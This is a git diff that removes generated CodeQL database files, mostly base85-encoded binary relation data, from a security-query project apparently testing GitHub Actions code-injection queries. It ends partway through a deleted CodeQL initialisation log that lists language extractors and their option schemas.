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 TopqiKb15e+`E{fHbItz;K!jeg diff --git a/db/db-yaml/default/yaml.rel.checksum b/db/db-yaml/default/yaml.rel.checksum deleted file mode 100644 index de6f34140970bfaacb1acf652a352d65a8f5675c..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 ScmZQzU|?hb0{$OcwgLbJRswPW 
diff --git a/db/db-yaml/default/yaml_locations.rel b/db/db-yaml/default/yaml_locations.rel deleted file mode 100644 index f46747ec341818ba278ef400b576bde6966ce296..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 11128 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 
diff --git a/db/db-yaml/default/yaml_scalars.rel b/db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index aa10fbd1a3ab8b089f766b6e623ff699b1dc88ff..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12540 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 Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. -[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db -[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. -[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. 
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml.
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml.
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml.
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml.
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml.
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml.
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml.
-[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml.
-[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed:
- {
- "aliases" : {
- "c" : "cpp",
- "c++" : "cpp",
- "c-c++" : "cpp",
- "c-cpp" : "cpp",
- "c#" : "csharp",
- "java-kotlin" : "java",
- "kotlin" : "java",
- "javascript-typescript" : "javascript",
- "typescript" : "javascript"
- },
- "extractors" : {
- "go" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go"
- }
- ],
- "python" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python",
- "extractor_options" : {
- "logging" : {
- "title" : "Options pertaining to logging.",
- "description" : "Options pertaining to logging.",
- "type" : "object",
- "properties" : {
- "verbosity" : {
- "title" : "Python extractor logging verbosity level.",
- "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n",
- "type" : "string",
- "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$"
- }
- }
- },
- "python_executable_name" : {
- "title" : "Controls the name of the Python executable used by the Python extractor.",
